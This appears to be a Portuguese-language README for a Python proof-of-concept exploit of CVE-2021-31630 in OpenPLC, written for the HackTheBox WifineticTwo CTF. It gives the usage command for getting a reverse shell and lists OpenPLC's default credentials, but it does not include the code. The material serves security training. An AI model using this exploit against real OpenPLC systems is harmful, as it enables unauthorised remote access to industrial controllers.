
Um script python simples para explorar CVE-2021-31630 no HTB WifineticTwo CTF
Este script Python é uma prova de conceito (PoC) de exploit para CVE-2021-31630, alvejando uma vulnerabilidade no OpenPLC executado na máquina WifineticTwo do HackTheBox. É projetado apenas para fins educacionais, visando demonstrar o processo de exploração em um ambiente controlado.
Esta ferramenta destina-se apenas a fins de pesquisa de segurança e educacionais. O uso desta ferramenta para atacar alvos sem consentimento mútuo prévio é ilegal. O desenvolvedor não será responsabilizado por quaisquer danos ou acusações criminais contra usuários que façam uso indevido deste exploit.
Antes de executar este exploit, certifique-se de ter:
requests instalada. Você pode instalá-la usando pip install requests.Para usar este exploit, você deve especificar a URL do alvo, o IP do host local (LHOST) e a porta local (LPORT) para a qual o reverse shell deve se conectar. Opcionalmente, você pode especificar o nome de usuário e a senha do OpenPLC se eles diferirem do padrão.
./exploit.py --target http://wifinetictwo.htb:8080 --lhost [LHOST] --lport [LPORT] [--usr [USERNAME] --pwd [PASSWORD]]
--target - Endereço base do alvo. Exemplo: http://wifinetictwo.htb:8080--lhost - Endereço IP do host local para o qual o reverse shell irá se conectar.--lport - Porta local para a qual o reverse shell irá se conectar.--usr - (Opcional) Nome de usuário para o OpenPLC. O padrão é openplc.--pwd - (Opcional) Senha para o OpenPLC. O padrão é openplc.